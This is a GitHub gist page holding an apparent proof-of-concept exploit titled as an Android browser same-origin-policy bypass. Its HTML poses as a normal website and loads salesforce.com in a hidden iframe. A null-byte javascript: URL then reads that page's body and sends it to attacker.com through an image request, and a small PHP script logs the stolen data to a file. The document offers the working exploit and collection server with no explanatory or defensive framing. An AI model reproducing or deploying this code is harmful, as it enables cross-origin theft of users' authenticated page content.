Skip to content

Instantly share code, notes, and snippets.

@yehgdotnet
Forked from joswr1ght/AndroidSOPBypass.html
Created February 28, 2018 13:28
Show Gist options
  • Save yehgdotnet/b15eceb675b2df245c9319c4ab2a59b5 to your computer and use it in GitHub Desktop.
Save yehgdotnet/b15eceb675b2df245c9319c4ab2a59b5 to your computer and use it in GitHub Desktop.
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
");
</script>
</body>
</html>
<?php file_put_contents("save.txt", json_encode($_GET). "\n", FILE_APPEND); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment